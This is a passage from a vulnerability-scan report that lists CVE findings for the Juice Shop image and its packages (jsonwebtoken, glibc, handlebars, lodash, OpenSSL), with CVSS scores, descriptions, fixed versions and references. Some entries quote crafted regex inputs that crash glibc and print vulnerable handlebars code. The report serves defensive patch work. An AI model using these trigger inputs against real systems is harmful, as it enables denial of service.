SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 287 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
jsonwebtoken0.4.0
+ + + + + + + +
File Path
juice-shop/node_modules/jsonwebtoken/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:L

+ + +
Description
+

jsonwebtoken: Insecure default algorithm in jwt.verify() could lead to signature validation bypass
+Target: Node.js
+Type: node-pkg
+Fixed version: 9.0.0

+

In versions <=8.5.1 of jsonwebtoken library, lack of algorithm definition in the jwt.verify() function can lead to signature validation bypass due to defaulting to the none algorithm for signature verification. Users are affected if you do not specify algorithms in the jwt.verify() + function. This issue has been fixed, please update to version 9.0.0 +which removes the default support for the none algorithm in the jwt.verify() method. There will be no impact, if you update to version 9.0.0 and you don’t need to allow for the none algorithm. If you need 'none' algorithm, you have to explicitly specify that in jwt.verify() options.

+ + +
Mitigation
+

9.0.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2022-23540
+https://github.com/auth0/node-jsonwebtoken
+https://github.com/auth0/node-jsonwebtoken/commit/e1fa9dcc12054a8681db4e6373da1b30cf7016e3
+https://github.com/auth0/node-jsonwebtoken/security/advisories/GHSA-qwph-4952-7xr6
+https://nvd.nist.gov/vuln/detail/CVE-2022-23540
+https://security.netapp.com/advisory/ntap-20240621-0007
+https://security.netapp.com/advisory/ntap-20240621-0007/
+https://www.cve.org/CVERecord?id=CVE-2022-23540

+ + + + + + + +
+
+
+
+ Finding 114: CVE-2022-23541 Jsonwebtoken 0.4.0 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 287 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
jsonwebtoken0.4.0
+ + + + + + + +
File Path
juice-shop/node_modules/jsonwebtoken/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L

+ + +
Description
+

jsonwebtoken: Insecure implementation of key retrieval function could lead to Forgeable Public/Private Tokens from RSA to HMAC
+Target: Node.js
+Type: node-pkg
+Fixed version: 9.0.0

+

jsonwebtoken is an implementation of JSON Web Tokens. Versions <= 8.5.1 of jsonwebtoken library can be misconfigured so that passing a poorly implemented key retrieval function referring to the secretOrPublicKey + argument from the readme link will result in incorrect verification of +tokens. There is a possibility of using a different algorithm and key +combination in verification, other than the one that was used to sign +the tokens. Specifically, tokens signed with an asymmetric public key +could be verified with a symmetric HS256 algorithm. This can lead to +successful validation of forged tokens. If your application is +supporting usage of both symmetric key and asymmetric key in +jwt.verify() implementation with the same key retrieval function. This +issue has been patched, please update to version 9.0.0.

+ + +
Mitigation
+

9.0.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2022-23541
+https://github.com/auth0/node-jsonwebtoken
+https://github.com/auth0/node-jsonwebtoken/commit/e1fa9dcc12054a8681db4e6373da1b30cf7016e3
+https://github.com/auth0/node-jsonwebtoken/releases/tag/v9.0.0
+https://github.com/auth0/node-jsonwebtoken/security/advisories/GHSA-hjrf-2m68-5959
+https://nvd.nist.gov/vuln/detail/CVE-2022-23541
+https://security.netapp.com/advisory/ntap-20240621-0007
+https://security.netapp.com/advisory/ntap-20240621-0007/
+https://www.cve.org/CVERecord?id=CVE-2022-23541

+ + + + + + + +

Low

+ +
+
+
+
+ Finding 40: CVE-2010-4756 Libc6 2.36-9+deb12u10 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Low + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 399 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libc62.36-9+deb12u10
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + + +
Description
+

glibc: glob implementation can cause excessive CPU and memory consumption due to crafted glob expressions
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version:

+

The glob implementation in the GNU C Library (aka glibc or libc6) +allows remote authenticated users to cause a denial of service (CPU and +memory consumption) via crafted glob expressions that do not match any +pathnames, as demonstrated by glob expressions in STAT commands to an +FTP daemon, a different vulnerability than CVE-2010-2632.

+ + + + + + +
Impact
+

affected

+ + + + + + + +
References
+

http://cxib.net/stuff/glob-0day.c
+http://securityreason.com/achievement_securityalert/89
+http://securityreason.com/exploitalert/9223
+https://access.redhat.com/security/cve/CVE-2010-4756
+https://bugzilla.redhat.com/show_bug.cgi?id=681681
+https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756
+https://nvd.nist.gov/vuln/detail/CVE-2010-4756
+https://security.netapp.com/advisory/ntap-20241108-0002/
+https://www.cve.org/CVERecord?id=CVE-2010-4756

+ + + + + + + +
+
+
+
+ Finding 41: CVE-2018-20796 Libc6 2.36-9+deb12u10 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Low + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 674 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libc62.36-9+deb12u10
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version:

+

In the GNU C Library (aka glibc or libc6) through 2.29, +check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled +Recursion, as demonstrated by '(\227|)(\1\1|t1|\\2537)+' in grep.

+ + + + + + +
Impact
+

affected

+ + + + + + + +
References
+

http://www.securityfocus.com/bid/107160
+https://access.redhat.com/security/cve/CVE-2018-20796
+https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141
+https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html
+https://nvd.nist.gov/vuln/detail/CVE-2018-20796
+https://security.netapp.com/advisory/ntap-20190315-0002/
+https://support.f5.com/csp/article/K26346590?utm_source=f5support&amp%3Butm_medium=RSS
+https://www.cve.org/CVERecord?id=CVE-2018-20796

+ + + + + + + +
+
+
+
+ Finding 42: CVE-2019-1010022 Libc6 2.36-9+deb12u10 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Low + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 119 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libc62.36-9+deb12u10
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

+ + +
Description
+

glibc: stack guard protection bypass
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version:

+

GNU Libc current is affected by: Mitigation bypass. The impact is: +Attacker may bypass stack guard protection. The component is: nptl. The +attack vector is: Exploit stack buffer overflow vulnerability and use +this bypass vulnerability to bypass stack guard. NOTE: Upstream comments + indicate "this is being treated as a non-security bug and no real +threat.

+ + + + + + +
Impact
+

affected

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2019-1010022
+https://nvd.nist.gov/vuln/detail/CVE-2019-1010022
+https://security-tracker.debian.org/tracker/CVE-2019-1010022
+https://sourceware.org/bugzilla/show_bug.cgi?id=22850
+https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3
+https://ubuntu.com/security/CVE-2019-1010022
+https://www.cve.org/CVERecord?id=CVE-2019-1010022

+ + + + + + + +
+
+
+
+ Finding 43: CVE-2019-1010023 Libc6 2.36-9+deb12u10 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + Low + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libc62.36-9+deb12u10
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

+ + +
Description
+

glibc: running ldd on malicious ELF leads to code execution because of wrong size computation
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version:

+

GNU Libc current is affected by: Re-mapping current loaded library +with malicious ELF file. The impact is: In worst case attacker may +evaluate privileges. The component is: libld. The attack vector is: +Attacker sends 2 ELF files to victim and asks to run ldd on it. ldd +execute code. NOTE: Upstream comments indicate "this is being treated as + a non-security bug and no real threat.

+ + + + + + +
Impact
+

affected

+ + + + + + + +
References
+

http://www.securityfocus.com/bid/109167
+https://access.redhat.com/security/cve/CVE-2019-1010023
+https://nvd.nist.gov/vuln/detail/CVE-2019-1010023
+https://security-tracker.debian.org/tracker/CVE-2019-1010023
+https://sourceware.org/bugzilla/show_bug.cgi?id=22851
+https://support.f5.com/csp/article/K11932200?utm_source=f5support&amp%3Butm_medium=RSS
+https://ubuntu.com/security/CVE-2019-1010023
+https://www.cve.org/CVERecord?id=CVE-2019-1010023

+ + + + + + + +
+
+
+
+ Finding 44: CVE-2019-1010024 Libc6 2.36-9+deb12u10 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Low + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 200 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libc62.36-9+deb12u10
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

+ + +
Description
+

glibc: ASLR bypass using cache of thread stack and heap
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version:

+

GNU Libc current is affected by: Mitigation bypass. The impact is: +Attacker may bypass ASLR using cache of thread stack and heap. The +component is: glibc. NOTE: Upstream comments indicate "this is being +treated as a non-security bug and no real threat.

+ + + + + + +
Impact
+

affected

+ + + + + + + +
References
+

http://www.securityfocus.com/bid/109162
+https://access.redhat.com/security/cve/CVE-2019-1010024
+https://nvd.nist.gov/vuln/detail/CVE-2019-1010024
+https://security-tracker.debian.org/tracker/CVE-2019-1010024
+https://sourceware.org/bugzilla/show_bug.cgi?id=22852
+https://support.f5.com/csp/article/K06046097
+https://support.f5.com/csp/article/K06046097?utm_source=f5support&amp%3Butm_medium=RSS
+https://ubuntu.com/security/CVE-2019-1010024
+https://www.cve.org/CVERecord?id=CVE-2019-1010024

+ + + + + + + +
+
+
+
+ Finding 45: CVE-2019-1010025 Libc6 2.36-9+deb12u10 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Low + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 330 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libc62.36-9+deb12u10
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

+ + +
Description
+

glibc: information disclosure of heap addresses of pthread_created thread
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version:

+

GNU Libc current is affected by: Mitigation bypass. The impact is: +Attacker may guess the heap addresses of pthread_created thread. The +component is: glibc. NOTE: the vendor's position is "ASLR bypass itself +is not a vulnerability.

+ + + + + + +
Impact
+

affected

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2019-1010025
+https://nvd.nist.gov/vuln/detail/CVE-2019-1010025
+https://security-tracker.debian.org/tracker/CVE-2019-1010025
+https://sourceware.org/bugzilla/show_bug.cgi?id=22853
+https://support.f5.com/csp/article/K06046097
+https://support.f5.com/csp/article/K06046097?utm_source=f5support&amp%3Butm_medium=RSS
+https://ubuntu.com/security/CVE-2019-1010025
+https://www.cve.org/CVERecord?id=CVE-2019-1010025

+ + + + + + + +
+
+
+
+ Finding 46: CVE-2019-9192 Libc6 2.36-9+deb12u10 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Low + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 674 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libc62.36-9+deb12u10
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version:

+

In the GNU C Library (aka glibc or libc6) through 2.29, +check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled +Recursion, as demonstrated by '(|)(\1\1)*' in grep, a different issue +than CVE-2018-20796. NOTE: the software maintainer disputes that this is + a vulnerability because the behavior occurs only with a crafted pattern

+ + + + + + +
Impact
+

affected

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2019-9192
+https://nvd.nist.gov/vuln/detail/CVE-2019-9192
+https://sourceware.org/bugzilla/show_bug.cgi?id=24269
+https://support.f5.com/csp/article/K26346590?utm_source=f5support&amp%3Butm_medium=RSS
+https://www.cve.org/CVERecord?id=CVE-2019-9192

+ + + + + + + +
+
+
+
+ Finding 47: CVE-2022-27943 Libgcc-S1 12.2.0-14+deb12u1 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Low + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 674 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libgcc-s112.2.0-14+deb12u1
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

+ + +
Description
+

binutils: libiberty/rust-demangle.c in GNU GCC 11.2 allows stack exhaustion in demangle_const
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version:

+

libiberty/rust-demangle.c in GNU GCC 11.2 allows stack consumption in demangle_const, as demonstrated by nm-new.

+ + + + + + +
Impact
+

affected

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2022-27943
+https://gcc.gnu.org/bugzilla/show_bug.cgi?id=105039
+https://gcc.gnu.org/git/gitweb.cgi?p=gcc.git;h=1a770b01ef415e114164b6151d1e55acdee09371
+https://gcc.gnu.org/git/gitweb.cgi?p=gcc.git;h=9234cdca6ee88badfc00297e72f13dac4e540c79
+https://gcc.gnu.org/git/gitweb.cgi?p=gcc.git;h=fc968115a742d9e4674d9725ce9c2106b91b6ead
+https://gcc.gnu.org/pipermail/gcc-patches/2022-March/592244.html
+https://lists.fedoraproject.org/archives/list/package- +announce%40lists.fedoraproject.org/message/ +H424YXGW7OKXS2NCAP35OP6Y4P4AW6VG/
+https://nvd.nist.gov/vuln/detail/CVE-2022-27943
+https://sourceware.org/bugzilla/show_bug.cgi?id=28995
+https://www.cve.org/CVERecord?id=CVE-2022-27943

+ + + + + + + +
+
+
+
+ Finding 48: CVE-2022-27943 Libgomp1 12.2.0-14+deb12u1 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Low + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 674 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libgomp112.2.0-14+deb12u1
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

+ + +
Description
+

binutils: libiberty/rust-demangle.c in GNU GCC 11.2 allows stack exhaustion in demangle_const
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version:

+

libiberty/rust-demangle.c in GNU GCC 11.2 allows stack consumption in demangle_const, as demonstrated by nm-new.

+ + + + + + +
Impact
+

affected

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2022-27943
+https://gcc.gnu.org/bugzilla/show_bug.cgi?id=105039
+https://gcc.gnu.org/git/gitweb.cgi?p=gcc.git;h=1a770b01ef415e114164b6151d1e55acdee09371
+https://gcc.gnu.org/git/gitweb.cgi?p=gcc.git;h=9234cdca6ee88badfc00297e72f13dac4e540c79
+https://gcc.gnu.org/git/gitweb.cgi?p=gcc.git;h=fc968115a742d9e4674d9725ce9c2106b91b6ead
+https://gcc.gnu.org/pipermail/gcc-patches/2022-March/592244.html
+https://lists.fedoraproject.org/archives/list/package- +announce%40lists.fedoraproject.org/message/ +H424YXGW7OKXS2NCAP35OP6Y4P4AW6VG/
+https://nvd.nist.gov/vuln/detail/CVE-2022-27943
+https://sourceware.org/bugzilla/show_bug.cgi?id=28995
+https://www.cve.org/CVERecord?id=CVE-2022-27943

+ + + + + + + +
+
+
+
+ Finding 100: GHSA-442j-39wm-28r2 Handlebars 4.7.7 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + Low + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
handlebars4.7.7
+ + + + + + + +
File Path
juice-shop/node_modules/handlebars/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N

+ + +
Description
+

Handlebars.js has a Property Access Validation Bypass in container.lookup
+Target: Node.js
+Type: node-pkg
+Fixed version: 4.7.9

+

Summary

+

In lib/handlebars/runtime.js, the container.lookup() function uses container.lookupProperty() + as a gate check to enforce prototype-access controls, but then discards + the validated result and performs a second, unguarded property access (depths[i][name]). + This Time-of-Check Time-of-Use (TOCTOU) pattern means the security +check and the actual read are decoupled, and the raw access bypasses any + sanitization that lookupProperty may perform.

+

Only relevant when the compat compile option is enabled ({compat: true}), which activates depthedLookup in lib/handlebars/compiler/javascript-compiler.js.

+

Description

+

The vulnerable code in lib/handlebars/runtime.js (lines 137–144):

+
lookup: function (depths, name) {
+  const len = depths.length;
+  for (let i = 0; i < len; i++) {
+    let result = depths[i] && container.lookupProperty(depths[i], name);
+    if (result != null) {
+      return depths[i][name];  // BUG: should be `return result;`
+    }
+  }
+},
+
+ +

container.lookupProperty() (lines 119–136) enforces hasOwnProperty checks and resultIsAllowed() prototype-access controls. However, container.lookup() only uses lookupProperty as a boolean gate — if the gate passes (result != null), it then performs an independent, raw depths[i][name] access that circumvents any transformation or wrapped value that lookupProperty may have returned.

+

Workarounds

+
    +
  • Avoid enabling { compat: true } when rendering templates that include untrusted data.
    • +
  • Ensure context data objects are plain JSON (no Proxies, no getter-based accessor properties).
    • +
+ + +
Mitigation
+

4.7.9

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://github.com/handlebars-lang/handlebars.js
+https://github.com/handlebars-lang/handlebars.js/commit/68d8df5a88e0a26fe9e6084c5c6aaebe67b07da2
+https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.9
+https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-442j-39wm-28r2

+ + + + + + + +
+
+
+
+ Finding 86: CVE-2026-24001 Diff 4.0.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Low + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 400 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
diff4.0.2
+ + + + + + + +
File Path
juice-shop/node_modules/ts-node-dev/node_modules/diff/package.json
+
+
+
+ + + + + +
Description
+

jsdiff: denial of service vulnerability in parsePatch and applyPatch
+Target: Node.js
+Type: node-pkg
+Fixed version: 8.0.3, 5.2.2, 4.0.4, 3.5.1

+

jsdiff is a JavaScript text differencing implementation. Prior to +versions 8.0.3, 5.2.2, 4.0.4, and 3.5.1, attempting to parse a patch +whose filename headers contain the line break characters \r, \u2028, or \u2029 can cause the parsePatch + method to enter an infinite loop. It then consumes memory without limit + until the process crashes due to running out of memory. Applications +are therefore likely to be vulnerable to a denial-of-service attack if +they call parsePatch with a user-provided patch as input. A + large payload is not needed to trigger the vulnerability, so size +limits on user input do not provide any protection. Furthermore, some +applications may be vulnerable even when calling parsePatch + on a patch generated by the application itself if the user is +nonetheless able to control the filename headers (e.g. by directly +providing the filenames of the files to be diffed). The applyPatch + method is similarly affected if (and only if) called with a string +representation of a patch as an argument, since under the hood it parses + that string using parsePatch. Other methods of the library + are unaffected. Finally, a second and lesser interdependent bug - a +ReDOS - also exhibits when those same line break characters are present +in a patch's patch header (also known as its "leading garbage"). A maliciously-crafted patch header of length n can take parsePatch O(n³) + time to parse. Versions 8.0.3, 5.2.2, 4.0.4, and 3.5.1 contain a fix. +As a workaround, do not attempt to parse patches that contain any of +these characters: \r, \u2028, or \u2029.

+ + +
Mitigation
+

8.0.3, 5.2.2, 4.0.4, 3.5.1

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-24001
+https://github.com/kpdecker/jsdiff
+https://github.com/kpdecker/jsdiff/commit/15a1585230748c8ae6f8274c202e0c87309142f5
+https://github.com/kpdecker/jsdiff/issues/653
+https://github.com/kpdecker/jsdiff/pull/649
+https://github.com/kpdecker/jsdiff/security/advisories/GHSA-73rr-hh4g-fpgx
+https://nvd.nist.gov/vuln/detail/CVE-2026-24001
+https://www.cve.org/CVERecord?id=CVE-2026-24001

+ + + + + + + +
+
+
+
+ Finding 121: CVE-2018-3721 Lodash 2.4.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Low + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 471 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
lodash2.4.2
+ + + + + + + +
File Path
juice-shop/node_modules/sanitize-html/node_modules/lodash/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

+ + +
Description
+

lodash: Prototype pollution in utilities function
+Target: Node.js
+Type: node-pkg
+Fixed version: >=4.17.5

+

lodash node module before 4.17.5 suffers from a Modification of +Assumed-Immutable Data (MAID) vulnerability via defaultsDeep, merge, and + mergeWith functions, which allows a malicious user to modify the +prototype of "Object" via proto, causing the addition or modification of an existing property that will exist on all objects.

+ + +
Mitigation
+
+

=4.17.5

+
+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2018-3721
+https://github.com/advisories/GHSA-fvqr-27wr-82fm
+https://github.com/lodash/lodash/commit/d8e069cc3410082e44eb18fcf8e7f3d08ebe1d4a
+https://github.com/rubysec/ruby-advisory-db/blob/master/gems/lodash-rails/CVE-2018-3721.yml
+https://hackerone.com/reports/310443
+https://nvd.nist.gov/vuln/detail/CVE-2018-3721
+https://security.netapp.com/advisory/ntap-20190919-0004
+https://security.netapp.com/advisory/ntap-20190919-0004/
+https://snyk.io/vuln/npm:lodash:20180130
+https://www.cve.org/CVERecord?id=CVE-2018-3721
+https://www.npmjs.com/advisories/577

+ + + + + + + +
+
+
+
+ Finding 64: CVE-2025-27587 Libssl3 3.0.17-1~deb12u2 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Low + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 385 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libssl33.0.17-1~deb12u2
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + + +
Description
+

OpenSSL 3.0.0 through 3.3.2 on the PowerPC architecture is vulnerable ...
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version:

+

OpenSSL 3.0.0 through 3.3.2 on the PowerPC architecture is vulnerable + to a Minerva attack, exploitable by measuring the time of signing of +random messages using the EVP_DigestSign API, and then using the private + key to extract the K value (nonce) from the signatures. Next, based on +the bit size of the extracted nonce, one can compare the signing time of + full-sized nonces to signatures that used smaller nonces, via +statistical tests. There is a side-channel in the P-364 curve that +allows private key extraction (also, there is a dependency between the +bit size of K and the size of the side channel). NOTE: This CVE is +disputed because the OpenSSL security policy explicitly notes that any +side channels which require same physical system to be detected are +outside of the threat model for the software. The timing signal is so +small that it is infeasible to be detected without having the attacking +process running on the same physical system.

+ + + + + + +
Impact
+

affected

+ + + + + + + +
References
+

https://github.com/openssl/openssl/issues/24253
+https://minerva.crocs.fi.muni.cz

+ + + + + + + +
+
+
+
+ Finding 65: CVE-2025-9232 Libssl3 3.0.17-1~deb12u2 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Low + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 125 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libssl33.0.17-1~deb12u2
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L

+ + +
Description
+

openssl: Out-of-bounds read in HTTP client no_proxy handling
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version: 3.0.17-1~deb12u3

+

Issue summary: An application using the OpenSSL HTTP client API functions may
+trigger an out-of-bounds read if the 'no_proxy' environment variable is set and
+the host portion of the authority component of the HTTP URL is an IPv6 address.

+

Impact summary: An out-of-bounds read can trigger a crash which leads to
+Denial of Service for an application.

+

The OpenSSL HTTP client API functions can be used directly by applications
+but they are also used by the OCSP client functions and CMP (Certificate
+Management Protocol) client implementation in OpenSSL. However the URLs used
+by these implementations are unlikely to be controlled by an attacker.

+

In this vulnerable code the out of bounds read can only trigger a crash.
+Furthermore the vulnerability requires an attacker-controlled URL to be
+passed from an application to the OpenSSL function and the user has to have
+a 'no_proxy' environment variable set. For the aforementioned reasons the
+issue was assessed as Low severity.

+

The vulnerable code was introduced in the following patch releases:
